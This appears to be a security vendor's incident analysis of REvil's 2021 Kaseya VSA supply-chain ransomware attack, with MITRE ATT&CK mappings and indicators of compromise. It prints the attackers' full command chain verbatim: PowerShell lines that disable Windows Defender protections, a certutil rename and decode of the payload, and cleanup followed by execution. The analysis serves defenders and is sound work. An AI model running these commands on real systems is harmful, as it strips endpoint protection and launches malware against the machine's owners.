🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
On 02 July 2021, Kaseya, an IT solutions developer catering to managed service providers (MSPs), disclosed that they were the victim of a large-scale ransomware attack. The attack, which was propagated by the popular RaaS group REvil, targeted Kaseya’s VSA infrastructure, compromising its supply chains. The ransomware group exploited a specific zero-day authentication vulnerability in the application to upload a malicious Base64 encoded file, infecting client infrastructure that has a VSA agent program running on the target servers.
Supply Chain Delivery Vector
Kaseya’s VSA is a Remote Monitoring and Management (RMM) software that enables MSPs to perform patch management, backups, and client monitoring for customers. The threat actors leveraged a zero-day authentication bypass vulnerability in the web interface of VSA, to gain an authenticated session, upload payload, and execute a series of commands via SQL to gain command execution. The ransomware was delivered as a software update masquerading as “Kaseya VSA Agent Hot-fix.” This procedure deployed an encryptor, which compromised the VSA server and was dropped in TempPath, under the filename “agent.crt.”
The payload file “agent.crt” is sent to an agent monitor program (C:\PROGRAM FILES (X86)\KASEYA\<ID>\AGENTMON.EXE, where ID is identification key for the server connected to the monitor instance), which monitors customer endpoints and determines if a terminal requires patching or updates, only to install them silently in the background. The agent monitor then writes “agent.crt” to the VSA agent working directory (C:\KWORKING\AGENT.crt).
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Execution
The following command is used to delay or disable the execution of PowerShell commands:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul
Followed by which, a PowerShell command is executed by the Agent monitor, as shown below:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreferenceÂ
- DisableRealtimeMonitoring $true
- DisableIntrusionPreventionSystem $trueÂ
- DisableIOAVProtection $trueÂ
- DisableScriptScanning $trueÂ
- EnableControlledFolderAccess DisabledÂ
- EnableNetworkProtection AuditMode -ForceÂ
- MAPSReporting DisabledÂ
- SubmitSamplesConsent NeverSend
These commands disable various protections implemented on the target system, specifically features of Windows Defender, such as network protection, IOfficeAntiVirus (IOAV), script scanning, MAPS Reporting, etc.
The following command creates a copy of the “certutil.exe” file, a certificate management utility present in all Windows versions, from the default location to Windows Directory and renames it as “cert.exe”:Â
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
This command-line appends random data to the end of cert.exe to change its signature, which helps to evade anti-malware security products:
echo %RANDOM% >> C:\Windows\cert.exe
The next command decodes the “agent.crt” file to “agent.exe”:
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exeÂ
Followed by which, this command line cleans up the file and executes “agent.exe”:
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Agent.exe: The Dropper
Agent.exe is a dropper that downloads the following artifacts:
| Artifacts | Description |
| MsMpEng.exe | Windows Defender component signed by Microsoft |
| Mpsvc.dll | Part of MsMpEng.exe |
REvil uses a particular version of “MsMpEng.exe,” which is vulnerable to Dynamic-link library (DLL) sideloading, which is a popular cyber attack method that takes advantage of how applications handle DLL files. It uses malicious DLL files instead of legitimate ones, which is then loaded and executed, infecting the target server.
Deployment of Ransomware Locker
A Ransomware Locker is hidden in the “mpsvc.dll” file and is executed when “MsMpEng.exe” is executed by the file “agent.exe”. This is an evasion tactic employed by the threat actor to bypass security checks.
MITRE ATT&CK Tactics and Techniques
| Initial Access | T1059.002 Supply Chain Compromise: Compromise Software Supply Chain |
| Execution | T1059.001 Command and Scripting Interpreter: PowerShell |
| Persistence & Privilege Escalation | T1574.002 Hijack Execution Flow: DLL Side-Loading |
| Defence Evasion | T1036.003 Masquerading: Rename System Utilities |
| T1562.001 Impair Defenses: Disable or Modify Tools | |
| T1140 Deobfuscate/Decode Files or Information | |
| T1574.002 Hijack Execution Flow: DLL Side-Loading | |
| T1070.004 Indicator Removal on Host: File Deletion | |
| T112 Modify Registry | |
| T1553.002 Subvert Trust Controls: Code Signing | |
| Impact | T1486 Data Encrypted for Impact |
| Files | C:\kworking\agent.exe (REvil Dropper) |
Indicators of Compromise
| Type | Indicator |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
C:\Windows\cert.exe |
|
(Note: Using this hash is ineffective since it is a random character added version of the certutil.exe file. You should use behavior-based detection, for example, renaming/copying certutil.exe) |
|
(Note: This file is an older version of Windows Defender. It is a legitimate binary, but it is used for malicious purposes by adversaries like other living off the land tools.) |
| Domains | https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txt |
| YARA Rules | https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rules |
| Registry Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter |
References
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/